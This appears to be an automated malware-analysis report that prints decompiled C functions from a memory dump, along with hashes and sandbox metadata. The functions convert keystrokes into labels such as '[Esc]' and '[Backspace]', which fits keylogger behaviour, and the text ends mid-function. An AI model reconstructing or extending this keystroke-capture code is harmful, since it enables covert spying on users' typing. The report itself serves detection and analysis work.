0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Numpad /], xrefs: 10007169

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Numpad /]
API String ID: 783433895-3841828083
Opcode ID: a69122926cd9ff44543af4826b796c0f070a02847923b1c1add8bc23721ad3f3
Instruction ID: fa9f52e14e4bae6c9c3f3ac931d5b0ad477dd65ff029e14091f69c139beb8dbd
Opcode Fuzzy Hash: a69122926cd9ff44543af4826b796c0f070a02847923b1c1add8bc23721ad3f3
Instruction Fuzzy Hash: 3931BEB8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489B24ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007196, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10007196(void* __eax, intOrPtr* __ebx, void* __ecx, void* __edx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t130;

				_t104 = __edi;
				_t76 = __ebx;
				_push(__edx);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t129 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t129);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t130 = _t56;
					if(_t130 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t130 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007196
0x10007196
0x10007196
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Numpad *], xrefs: 1000719C

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Numpad *]
API String ID: 783433895-2575978678
Opcode ID: 40a71dd3fd3848f36daa4371efc6091b58f5d128a51f6a9aba358ae957a7c821
Instruction ID: d9c473077837587251831d3c435770d097e1af4f38d4c7dbbca54610dc210ef0
Opcode Fuzzy Hash: 40a71dd3fd3848f36daa4371efc6091b58f5d128a51f6a9aba358ae957a7c821
Instruction Fuzzy Hash: B831C0B8F042545BF722D7658C45B9F73A9FB882C0F50C1A5F5489B20ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007145, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007145(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Backspace]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007145
0x10007145
0x1000714c
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Backspace], xrefs: 10007147

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Backspace]
API String ID: 783433895-3993161958
Opcode ID: ce0ad2ca1f90caf9ea666e0b07d6a3e8c10c8d2f93d8c23ca1895d0225b460b2
Instruction ID: 70b2502395a00a419c57d53d4495c89bce5646a586783f0d1f72156cf019b369
Opcode Fuzzy Hash: ce0ad2ca1f90caf9ea666e0b07d6a3e8c10c8d2f93d8c23ca1895d0225b460b2
Instruction Fuzzy Hash: 9031C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007156, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007156(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Numpad .]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007156
0x10007156
0x1000715d
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Numpad .], xrefs: 10007158

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Numpad .]
API String ID: 783433895-4259747250
Opcode ID: b54b2f61d87570f8875ef0f8debff805adedceafda15ff330bb240909df8f3a1
Instruction ID: 0bc05a9cc8b03a63822bed3d9a4d5e012b227a2082e24ae561fe8c67785f8955
Opcode Fuzzy Hash: b54b2f61d87570f8875ef0f8debff805adedceafda15ff330bb240909df8f3a1
Instruction Fuzzy Hash: 2A31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007178, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007178(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Esc]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007178
0x10007178
0x1000717f
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Esc], xrefs: 1000717A

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Esc]
API String ID: 783433895-3858598201
Opcode ID: 77c0f584e0695a7ac5b051d0ce750dd1d5baeb7579199a9787a9a3ee3ba27aa5
Instruction ID: a0438d12f8ed14f13429e205a5184d8ddefa3685f311b8074393ca4d61dc1d3f
Opcode Fuzzy Hash: 77c0f584e0695a7ac5b051d0ce750dd1d5baeb7579199a9787a9a3ee3ba27aa5
Instruction Fuzzy Hash: 6131C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489724ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007255, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007255(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Back Tab]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007255
0x10007255
0x1000725c
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

[Back Tab], xrefs: 10007257
Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Back Tab]
API String ID: 783433895-1646378708
Opcode ID: 93a1f9fd4b03a2b64f3aec136e1b11870f180bc3e6a4538c105c08aaf9b2b6df
Instruction ID: 3a85998fe2589ccb64e60228e5e214ad5b480cee4fe54291cbf2aada2de1e6bb
Opcode Fuzzy Hash: 93a1f9fd4b03a2b64f3aec136e1b11870f180bc3e6a4538c105c08aaf9b2b6df
Instruction Fuzzy Hash: 4131C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007266, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007266(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Copy]");
				E10003A34( *__ebx, 0);
